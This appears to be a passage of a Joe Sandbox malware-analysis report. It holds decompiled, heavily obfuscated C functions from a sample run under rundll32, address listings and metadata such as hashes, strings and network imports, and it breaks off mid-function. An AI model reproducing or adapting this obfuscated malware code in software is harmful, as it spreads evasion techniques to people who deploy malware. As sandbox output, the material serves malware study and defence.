				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E002ED389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E002E1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E002E1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E002ED2CE(_t620);
									__eflags = _t592 - E002D3DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E002EBB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E002EDA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E002DB6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E002D8969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E002D47CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E002EDCF7(_v1680, 0x2d1328, __eflags),  &_v524, _v1776, _v1712);
									E002DA8B0(_v1704, _t598, _v1800);
									_t603 = E002DEA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E002DAB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E002E1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E002E1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E002E1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}






























































































                                                                                                                                  0x002e6df8
                                                                                                                                  0x002e6dfe
                                                                                                                                  0x002e6e0b
                                                                                                                                  0x002e6e14
                                                                                                                                  0x002e6e1b
                                                                                                                                  0x002e6e22
                                                                                                                                  0x002e6e2d
                                                                                                                                  0x002e6e38
                                                                                                                                  0x002e6e40
                                                                                                                                  0x002e6e4b
                                                                                                                                  0x002e6e53
                                                                                                                                  0x002e6e64
                                                                                                                                  0x002e6e68
                                                                                                                                  0x002e6e6a
                                                                                                                                  0x002e6e6f
                                                                                                                                  0x002e6e74
                                                                                                                                  0x002e6e7c
                                                                                                                                  0x002e6e87
                                                                                                                                  0x002e6e92
                                                                                                                                  0x002e6e9d
                                                                                                                                  0x002e6ea8
                                                                                                                                  0x002e6eb0
                                                                                                                                  0x002e6ebb
                                                                                                                                  0x002e6ec3
                                                                                                                                  0x002e6ecb
                                                                                                                                  0x002e6ed3
                                                                                                                                  0x002e6edb
                                                                                                                                  0x002e6ee3
                                                                                                                                  0x002e6ef7
                                                                                                                                  0x002e6efc
                                                                                                                                  0x002e6f05
                                                                                                                                  0x002e6f10
                                                                                                                                  0x002e6f18
                                                                                                                                  0x002e6f20
                                                                                                                                  0x002e6f28
                                                                                                                                  0x002e6f30
                                                                                                                                  0x002e6f38
                                                                                                                                  0x002e6f43
                                                                                                                                  0x002e6f4b
                                                                                                                                  0x002e6f56
                                                                                                                                  0x002e6f5e
                                                                                                                                  0x002e6f63
                                                                                                                                  0x002e6f6b
                                                                                                                                  0x002e6f73
                                                                                                                                  0x002e6f7b
                                                                                                                                  0x002e6f80
                                                                                                                                  0x002e6f89
                                                                                                                                  0x002e6f8a
                                                                                                                                  0x002e6f8e
                                                                                                                                  0x002e6f96
                                                                                                                                  0x002e6fa1
                                                                                                                                  0x002e6fa9
                                                                                                                                  0x002e6fb4
                                                                                                                                  0x002e6fbf
                                                                                                                                  0x002e6fc7
                                                                                                                                  0x002e6fd5
                                                                                                                                  0x002e6fd9
                                                                                                                                  0x002e6fe1
                                                                                                                                  0x002e6fec
                                                                                                                                  0x002e6ff7
                                                                                                                                  0x002e7002
                                                                                                                                  0x002e700d
                                                                                                                                  0x002e7020
                                                                                                                                  0x002e7027
                                                                                                                                  0x002e7032
                                                                                                                                  0x002e703d
                                                                                                                                  0x002e7050
                                                                                                                                  0x002e7055
                                                                                                                                  0x002e705e
                                                                                                                                  0x002e7069
                                                                                                                                  0x002e7071
                                                                                                                                  0x002e7079
                                                                                                                                  0x002e7081
                                                                                                                                  0x002e7089
                                                                                                                                  0x002e7094
                                                                                                                                  0x002e709f
                                                                                                                                  0x002e70aa
                                                                                                                                  0x002e70b5
                                                                                                                                  0x002e70c0
                                                                                                                                  0x002e70cb
                                                                                                                                  0x002e70d6
                                                                                                                                  0x002e70e1
                                                                                                                                  0x002e70ec
                                                                                                                                  0x002e70fe
                                                                                                                                  0x002e7103
                                                                                                                                  0x002e710c
                                                                                                                                  0x002e7117
                                                                                                                                  0x002e711f
                                                                                                                                  0x002e7129
                                                                                                                                  0x002e712c
                                                                                                                                  0x002e7130
                                                                                                                                  0x002e7138
                                                                                                                                  0x002e714b
                                                                                                                                  0x002e7152
                                                                                                                                  0x002e715d
                                                                                                                                  0x002e7168
                                                                                                                                  0x002e7173
                                                                                                                                  0x002e717e
                                                                                                                                  0x002e7186
                                                                                                                                  0x002e718e
                                                                                                                                  0x002e7193
                                                                                                                                  0x002e719b
                                                                                                                                  0x002e71a3
                                                                                                                                  0x002e71b6
                                                                                                                                  0x002e71bd
                                                                                                                                  0x002e71c8
                                                                                                                                  0x002e71d0
                                                                                                                                  0x002e71d5
                                                                                                                                  0x002e71da
                                                                                                                                  0x002e71e2
                                                                                                                                  0x002e71ea
                                                                                                                                  0x002e7200
                                                                                                                                  0x002e7207
                                                                                                                                  0x002e720f
                                                                                                                                  0x002e721a
                                                                                                                                  0x002e7225
                                                                                                                                  0x002e7230
                                                                                                                                  0x002e723b
                                                                                                                                  0x002e7248
                                                                                                                                  0x002e7249
                                                                                                                                  0x002e7253
                                                                                                                                  0x002e7257
                                                                                                                                  0x002e725c
                                                                                                                                  0x002e7264
                                                                                                                                  0x002e726f
                                                                                                                                  0x002e727a
                                                                                                                                  0x002e7285
                                                                                                                                  0x002e7296
                                                                                                                                  0x002e7299
                                                                                                                                  0x002e729d
                                                                                                                                  0x002e72a5
                                                                                                                                  0x002e72ad
                                                                                                                                  0x002e72b5
                                                                                                                                  0x002e72bd
                                                                                                                                  0x002e72c7
                                                                                                                                  0x002e72cb
                                                                                                                                  0x002e72d3
                                                                                                                                  0x002e72e6
                                                                                                                                  0x002e72ed
                                                                                                                                  0x002e72f8
                                                                                                                                  0x002e7303
                                                                                                                                  0x002e730e
                                                                                                                                  0x002e7319
                                                                                                                                  0x002e7324
                                                                                                                                  0x002e732c
                                                                                                                                  0x002e7344
                                                                                                                                  0x002e7348
                                                                                                                                  0x002e7350
                                                                                                                                  0x002e7363
                                                                                                                                  0x002e7366
                                                                                                                                  0x002e736d
                                                                                                                                  0x002e7378
                                                                                                                                  0x002e7380
                                                                                                                                  0x002e7388
                                                                                                                                  0x002e738d
                                                                                                                                  0x002e7395
                                                                                                                                  0x002e739d
                                                                                                                                  0x002e73a8
                                                                                                                                  0x002e73b0
                                                                                                                                  0x002e73bb
                                                                                                                                  0x002e73c3
                                                                                                                                  0x002e73cb
                                                                                                                                  0x002e73d0
                                                                                                                                  0x002e73d5
                                                                                                                                  0x002e73dd
                                                                                                                                  0x002e73e8
                                                                                                                                  0x002e73f0
                                                                                                                                  0x002e73fb
                                                                                                                                  0x002e740f
                                                                                                                                  0x002e7416
                                                                                                                                  0x002e7421
                                                                                                                                  0x002e742e
                                                                                                                                  0x002e7432
                                                                                                                                  0x002e743a
                                                                                                                                  0x002e743f
                                                                                                                                  0x002e7447
                                                                                                                                  0x002e744f
                                                                                                                                  0x002e7454
                                                                                                                                  0x002e7459
                                                                                                                                  0x002e7461
                                                                                                                                  0x002e746e
                                                                                                                                  0x002e7472
                                                                                                                                  0x002e747a
                                                                                                                                  0x002e7482
                                                                                                                                  0x002e748d
                                                                                                                                  0x002e7498
                                                                                                                                  0x002e74a3
                                                                                                                                  0x002e74ab
                                                                                                                                  0x002e74b0
                                                                                                                                  0x002e74be
                                                                                                                                  0x002e74c8
                                                                                                                                  0x002e74cc
                                                                                                                                  0x002e74d4
                                                                                                                                  0x002e74df
                                                                                                                                  0x002e74f5
                                                                                                                                  0x002e74fe
                                                                                                                                  0x002e7509
                                                                                                                                  0x002e7514
                                                                                                                                  0x002e751f
                                                                                                                                  0x002e752a
                                                                                                                                  0x002e7532
                                                                                                                                  0x002e7537
                                                                                                                                  0x002e753c
                                                                                                                                  0x002e7541
                                                                                                                                  0x002e7549
                                                                                                                                  0x002e7554
                                                                                                                                  0x002e755c
                                                                                                                                  0x002e7567
                                                                                                                                  0x002e7572
                                                                                                                                  0x002e757a
                                                                                                                                  0x002e7585
                                                                                                                                  0x002e7590
                                                                                                                                  0x002e759d
                                                                                                                                  0x002e759e
                                                                                                                                  0x002e75a2
                                                                                                                                  0x002e75a7
                                                                                                                                  0x002e75af
                                                                                                                                  0x002e75b7
                                                                                                                                  0x002e75c1
                                                                                                                                  0x002e75c5
                                                                                                                                  0x002e75cd
                                                                                                                                  0x002e75d5
                                                                                                                                  0x002e75e8
                                                                                                                                  0x002e75ef
                                                                                                                                  0x002e75fa
                                                                                                                                  0x002e7602
                                                                                                                                  0x002e760a
                                                                                                                                  0x002e7612
                                                                                                                                  0x002e761a
                                                                                                                                  0x002e7622
                                                                                                                                  0x002e762a
                                                                                                                                  0x002e762f
                                                                                                                                  0x002e7637
                                                                                                                                  0x002e763f
                                                                                                                                  0x002e7647
                                                                                                                                  0x002e7652
                                                                                                                                  0x002e765a
                                                                                                                                  0x002e7665
                                                                                                                                  0x002e766d
                                                                                                                                  0x002e7675
                                                                                                                                  0x002e767d
                                                                                                                                  0x002e7685
                                                                                                                                  0x002e7690
                                                                                                                                  0x002e769b
                                                                                                                                  0x002e76a6
                                                                                                                                  0x002e76b1
                                                                                                                                  0x002e76c5
                                                                                                                                  0x002e76cc
                                                                                                                                  0x002e76d7
                                                                                                                                  0x002e76df
                                                                                                                                  0x002e76e7
                                                                                                                                  0x002e76ec
                                                                                                                                  0x002e76f4
                                                                                                                                  0x002e76fc
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e770d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e770d
                                                                                                                                  0x002e7717
                                                                                                                                  0x002e799c
                                                                                                                                  0x002e79aa
                                                                                                                                  0x002e79ca
                                                                                                                                  0x002e79cf
                                                                                                                                  0x002e79d2
                                                                                                                                  0x002e79d4
                                                                                                                                  0x002e79fa
                                                                                                                                  0x002e7a1f
                                                                                                                                  0x002e7a24
                                                                                                                                  0x002e7a24
                                                                                                                                  0x002e78e9
                                                                                                                                  0x002e78e9
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7708
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7708
                                                                                                                                  0x002e7703
                                                                                                                                  0x002e7723
                                                                                                                                  0x002e7977
                                                                                                                                  0x002e7983
                                                                                                                                  0x002e798a
                                                                                                                                  0x002e798f
                                                                                                                                  0x002e7994
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7994
                                                                                                                                  0x002e772f
                                                                                                                                  0x002e7913
                                                                                                                                  0x002e7915
                                                                                                                                  0x002e7957
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7957
                                                                                                                                  0x002e7917
                                                                                                                                  0x002e7918
                                                                                                                                  0x002e793d
                                                                                                                                  0x002e7942
                                                                                                                                  0x002e7945
                                                                                                                                  0x002e7947
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e77e4
                                                                                                                                  0x002e794d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e794d
                                                                                                                                  0x002e773b
                                                                                                                                  0x002e7909
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7909
                                                                                                                                  0x002e7747
                                                                                                                                  0x002e7804
                                                                                                                                  0x002e783e
                                                                                                                                  0x002e7848
                                                                                                                                  0x002e784d
                                                                                                                                  0x002e7859
                                                                                                                                  0x002e78a6
                                                                                                                                  0x002e78b8
                                                                                                                                  0x002e78dd
                                                                                                                                  0x002e78e2
                                                                                                                                  0x002e78e5
                                                                                                                                  0x002e78e7
                                                                                                                                  0x002e78f0
                                                                                                                                  0x002e78fa
                                                                                                                                  0x002e78fc
                                                                                                                                  0x002e7901
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7901
                                                                                                                                  0x00000000
                                                                                                                                  0x002e78e7
                                                                                                                                  0x002e774d
                                                                                                                                  0x002e7753
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e7759
                                                                                                                                  0x002e7764
                                                                                                                                  0x002e7765
                                                                                                                                  0x002e7766
                                                                                                                                  0x002e776f
                                                                                                                                  0x002e7770
                                                                                                                                  0x002e7782
                                                                                                                                  0x002e7784
                                                                                                                                  0x002e778e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e77ad
                                                                                                                                  0x00000000
                                                                                                                                  0x002e77d7
                                                                                                                                  0x002e7a49
                                                                                                                                  0x002e7a4e
                                                                                                                                  0x002e7a51
                                                                                                                                  0x002e7a56
                                                                                                                                  0x002e7a5b
                                                                                                                                  0x002e7a60
                                                                                                                                  0x002e7a60
                                                                                                                                  0x002e7a60
                                                                                                                                  0x00000000
                                                                                                                                  0x002e770d
                                                                                                                                  0x002e7708

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                                  • API String ID: 0-2206596976
                                                                                                                                  • Opcode ID: c914cbb910e02b4d1b8fc699c028d7e9455d39e77e7df95cb69886fa927cd01e
                                                                                                                                  • Instruction ID: 72ba60fbb5596dc1a59245afc21f0724c0cb1e19747a1ee5334bbec773757c8a
                                                                                                                                  • Opcode Fuzzy Hash: c914cbb910e02b4d1b8fc699c028d7e9455d39e77e7df95cb69886fa927cd01e
                                                                                                                                  • Instruction Fuzzy Hash: 8F52FC715083818BD378CF21C98AB9FBBE1BBC4308F508A1DE5DA96260D7B18959CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 10012C6C
                                                                                                                                  • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                                  • _strcat.LIBCMT ref: 10012CE9
                                                                                                                                  • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                                  • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                                    • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                    • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    • Part of subcall function 1001DD46: GetDlgItem.USER32(?,4CC2CB6B), ref: 1001DD53
                                                                                                                                    • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                                  • String ID: Connected$Disconnected$Wait...
                                                                                                                                  • API String ID: 2263617321-2304371739
                                                                                                                                  • Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                  • Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
                                                                                                                                  • Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
                                                                                                                                  • Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D2251 Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D2251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E002D3DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
